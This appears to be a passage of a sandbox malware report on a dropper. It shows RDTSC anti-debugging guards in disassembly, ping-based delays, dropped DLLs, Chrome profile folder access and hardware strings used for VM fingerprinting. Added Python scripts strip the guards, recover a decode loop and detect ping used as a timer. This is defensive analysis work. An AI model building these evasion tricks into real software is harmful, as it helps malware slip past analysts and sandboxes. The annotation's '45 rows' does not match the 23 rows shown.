Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
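The rows above are not 45 separate timing checks. Every original instruction of the routine is wrapped in the same guard: pushfd / pushad / xor ecx, ecx / rdtsc on one side, rdtsc / sub ecx, eax / cmp ecx, 0 / jne / popad / popfd on the other, so two consecutive TSC reads are compared around each protected instruction and a hypervisor or debugger that disturbs RDTSC changes the branch. The interceptor logs one guard plus the one instruction it protects per row, which is why the rows alternate between a two-read probe and a check-plus-payload block. Stripping the guards leaves the real code: my reading of the payload rows is a call to 00403FA9h with buffer 00404779h, length 13C5h, key 00403F45h and key length 5 on the stack, followed by a loop that subtracts key[i mod 5] from buffer[i]. The following script is an added example, not part of the report or of the sample: it parses interceptor rows (four copied from the report), strips the guards, and re-implements the recovered loop over a constructed key and buffer, since the real bytes at those addresses are not in the report.

```python
"""Strip the per-instruction RDTSC guards from "RDTSC instruction interceptor"
rows and recover the instruction stream they hide.

Added example, not part of the Joe Sandbox report or of the sample. SAMPLE_LINES
are four rows copied from the report. The key and buffer handed to decode_sub()
are constructed: the bytes the sample keeps at 0x00403F45 (key) and 0x00404779
(buffer) are not in the report.
"""
import re

SAMPLE_LINES = [
    # probe half of a guard: two rdtsc reads and nothing else
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\56BB1610C0318054.exeRDTSC instruction "
    "interceptor: First address: 000000000040434E second address: 0000000000404354 "
    "instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc",
    # check half of a guard wrapped around "div dword ptr [ebp+14h]"
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\56BB1610C0318054.exeRDTSC instruction "
    "interceptor: First address: 0000000000404185 second address: 00000000004041A9 "
    "instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h "
    "0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd "
    "0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad "
    "0x00000010 xor ecx, ecx 0x00000012 rdtsc",
    # same guard around "movsx ecx, byte ptr [eax+edx]"
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\56BB1610C0318054.exeRDTSC instruction "
    "interceptor: First address: 00000000004041DC second address: 00000000004041F9 "
    "instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h "
    "0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd "
    "0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad "
    "0x00000011 xor ecx, ecx 0x00000013 rdtsc",
    # same guard around "sub eax, ecx"
    "Source: C:\\Users\\user\\AppData\\Local\\Temp\\56BB1610C0318054.exeRDTSC instruction "
    "interceptor: First address: 0000000000404270 second address: 000000000040428F "
    "instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h "
    "0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd "
    "0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad "
    "0x0000000f xor ecx, ecx 0x00000011 rdtsc",
]

_ROW_RE = re.compile(r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
                     r"\s+instructions:\s*(.*)$")
# "0x<offset> <instruction>" tokens; an instruction runs up to the next offset token
_INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|\s*$)")

GUARD_HEAD = ["rdtsc", "sub ecx, eax", "cmp ecx, 00000000h"]   # then "jne <target>", "popad", "popfd"
GUARD_TAIL = ["pushfd", "pushad", "xor ecx, ecx", "rdtsc"]
PROBE = ["rdtsc", "mov ecx, eax", "xor eax, eax", "rdtsc"]


def parse_row(line):
    """(first address, second address, [(offset, instruction), ...]) or None."""
    m = _ROW_RE.search(line)
    if m is None:
        return None
    first, second, text = m.groups()
    insns = [(int(off, 16), txt) for off, txt in _INSN_RE.findall(text)]
    return int(first, 16), int(second, 16), insns


def strip_guard(insns):
    """Return only the protected instruction(s); [] for a probe row."""
    texts = [t for _, t in insns]
    if texts == PROBE:
        return []
    shaped = (len(texts) >= 10 and texts[:3] == GUARD_HEAD and texts[3].startswith("jne ")
              and texts[4:6] == ["popad", "popfd"] and texts[-4:] == GUARD_TAIL)
    if not shaped:
        raise ValueError(f"row does not have the guard shape: {texts}")
    return insns[6:-4]


def recover_stream(lines):
    """[(address, instruction), ...] in row order, guards removed."""
    stream = []
    for line in lines:
        row = parse_row(line)
        if row is not None:
            first, _second, insns = row
            stream.extend((first + off, txt) for off, txt in strip_guard(insns))
    return stream


def decode_sub(buf, key):
    """The loop the stripped rows after 'call ebx' spell out, as I read them:
    for i < len: buf[i] = buf[i] - key[i % keylen], kept to one byte.
    Sign-extending the key byte (movsx) changes nothing once only AL is stored."""
    out = bytearray(buf)
    for i in range(len(out)):
        out[i] = (out[i] - key[i % len(key)]) & 0xFF
    return bytes(out)


def encode_add(plain, key):
    """Inverse of decode_sub, used only to build test input."""
    return bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(plain))


if __name__ == "__main__":
    for addr, insn in recover_stream(SAMPLE_LINES):
        print(f"{addr:08X}  {insn}")
    key = b"\x10\x80\x03\x7f\xff"          # constructed 5-byte key (the call site pushes keylen 5)
    print(decode_sub(encode_add(b"constructed plaintext", key), key))
```

Run over all 45 rows the script prints the routine in execution order; the payload address is the row's first address plus the 0x0b offset at which the protected instruction sits. A row whose shape does not match raises rather than silently passing guard instructions through as payload.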
Uses ping.exe to sleep
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
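The six rows above are one idiom seen three times: ping against loopback with -n, launched through cmd.exe. No packet leaves the host, and ping waits about a second between echo requests, so "ping 127.0.0.1 -n 3" is a two-second delay that never calls Sleep() in the sample's own process. Telling that apart from ping used as a reachability check, which the same sample also does, is a matter of looking at the target. The detection below is an added example, not from the report; EVENTS is constructed to mirror the report's rows plus two contrasting cases.

```python
"""Tell ping.exe used as a timer apart from ping.exe used as a network probe,
from process-creation events. Added example, not from the report; EVENTS is
constructed to mirror the report's 'ping 127.0.0.1 -n 3' rows."""
import re
from ipaddress import ip_address

EVENTS = [  # constructed events: parent image, child image, command line
    {"parent": r"C:\Windows\SysWOW64\cmd.exe", "image": r"C:\Windows\SysWOW64\PING.EXE", "cmd": "ping 127.0.0.1 -n 3"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe", "image": r"C:\Windows\SysWOW64\PING.EXE", "cmd": "ping -n 10 127.0.0.1 > nul"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\PING.EXE", "cmd": "ping -n 1 -w 1000 10.0.0.5"},
    {"parent": r"C:\Windows\explorer.exe",     "image": r"C:\Windows\System32\PING.EXE", "cmd": "ping localhost -n 4"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe", "image": r"C:\Windows\SysWOW64\PING.EXE", "cmd": "ping 127.0.0.1"},
]

_LOOPBACK_NAMES = {"localhost", "127.0.0.1", "::1"}   # is_loopback covers the rest of 127/8
_VALUE_OPTS = {"-w", "-l", "-i", "-v", "-r", "-s", "-j", "-k"}  # Windows ping options that take a value


def parse_ping(cmd):
    """Return (target, echo count) for a Windows ping command line, or None if it is not one."""
    cmd = re.split(r"\s*\d?>|&|\|", cmd)[0]          # drop redirections and chained commands
    toks = cmd.split()
    if not toks or toks[0].lower().rsplit("\\", 1)[-1] not in ("ping", "ping.exe"):
        return None
    target, count, i = None, 4, 1                    # ping sends 4 echo requests by default
    while i < len(toks):
        t = toks[i].lower()
        if t == "-n" and i + 1 < len(toks):
            count = int(toks[i + 1]) if toks[i + 1].isdigit() else count
            i += 2
        elif t in _VALUE_OPTS and i + 1 < len(toks):
            i += 2
        elif t.startswith("-") or t.startswith("/"):
            i += 1                                   # flags such as -t, -a, -4, -6
        else:
            target, i = toks[i], i + 1
    return target, count


def is_loopback(target):
    if target is None:
        return False
    if target.lower() in _LOOPBACK_NAMES:
        return True
    try:
        return ip_address(target).is_loopback
    except ValueError:
        return False


def ping_sleep_findings(events):
    """Ping invocations that only burn time: loopback target, so the wait is
    roughly (count - 1) seconds of one-second inter-request gaps."""
    findings = []
    for ev in events:
        if ev["image"].rsplit("\\", 1)[-1].lower() != "ping.exe":
            continue
        parsed = parse_ping(ev["cmd"])
        if parsed is None:
            continue
        target, count = parsed
        if is_loopback(target):
            findings.append({"parent": ev["parent"], "cmd": ev["cmd"], "target": target,
                             "count": count, "approx_sleep_s": max(count - 1, 0)})
    return findings


if __name__ == "__main__":
    for f in ping_sleep_findings(EVENTS):
        print(f"{f['parent']} -> {f['cmd']!r}: ~{f['approx_sleep_s']} s delay")
```

The 10.0.0.5 event is left alone on purpose: a ping to another host is the reachability check the report lists separately, and flagging every ping.exe would bury the timer idiom in noise. The parent is carried through so the finding can be correlated with whichever cmd.exe the dropper spawned.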
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 4652Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6000Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6548Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
Source: 56BB1610C0318054.exe, 00000002.00000003.388069693.0000000003D66000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.387589885.0000000003D78000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
